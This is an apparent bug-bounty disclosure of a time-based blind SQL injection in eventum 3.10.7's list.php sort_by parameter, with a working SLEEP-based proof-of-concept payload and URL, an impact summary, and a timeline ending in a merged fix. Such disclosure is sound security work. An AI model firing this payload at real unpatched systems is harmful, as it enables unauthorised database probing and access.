SQL Injection in eventum/eventum

Valid

Reported on

Oct 27th 2021


Description

Time-Based Blind SQL Injection in eventum 3.10.7

Proof of Concept

// PoC.payload

// Advanced Search
// Parameter: sort_by
priority[0]=0&severity[0]=0&users[0]=0&category[0]=0&status[0]=0&release[0]=0&rows=5&sort_by=pri_rank AND (SELECT 2168 FROM (SELECT(SLEEP(5)))UNFg)&sort_order=ASC&hide_closed=1&show_authorized_issues=&show_notification_list_issues=&search_type=all_text&reporter[0]=0&customer_id=&product[0]=0&custom_field=&nosave=
// PoC.url

// Advanced Search 
http://[DOMAIN]/list.php?priority[0]=0&severity[0]=0&users[0]=0&category[0]=0&status[0]=0&release[0]=0&rows=5&sort_by=pri_rank%20AND%20(SELECT%202168%20FROM%20(SELECT(SLEEP(5)))UNFg)&sort_order=ASC&hide_closed=1&show_authorized_issues=&show_notification_list_issues=&search_type=all_text&reporter[0]=0&customer_id=&product[0]=0&custom_field=&nosave=

Impact

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

References

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have opened a pull request with a SECURITY.md for eventum to merge. a month ago
lethanhphuc modified their report
a month ago
lethanhphuc modified their report
a month ago
We have contacted a member of the eventum team and are waiting to hear back a month ago
We have sent a follow up to the eventum team. We will try again in 7 days. a month ago
We have sent a second follow up to the eventum team. We will try again in 10 days. 25 days ago
lethanhphuc
22 days ago

Researcher


@maintainer Can you validate the report?

lethanhphuc modified their report
22 days ago
lethanhphuc submitted a
22 days ago
eventum/eventum maintainer validated this vulnerability 22 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
eventum/eventum maintainer
22 days ago

Maintainer


The bug is valid, but the fix in this PR is broken and incomplete:

  • https://github.com/eventum/eventum/pull/1252
eventum/eventum maintainer
22 days ago

Maintainer


Better and tested fix was submitted:

  • https://github.com/eventum/eventum/pull/1255
eventum/eventum maintainer confirmed that a fix has been merged on 15f749 22 days ago
lethanhphuc has been awarded the fix bounty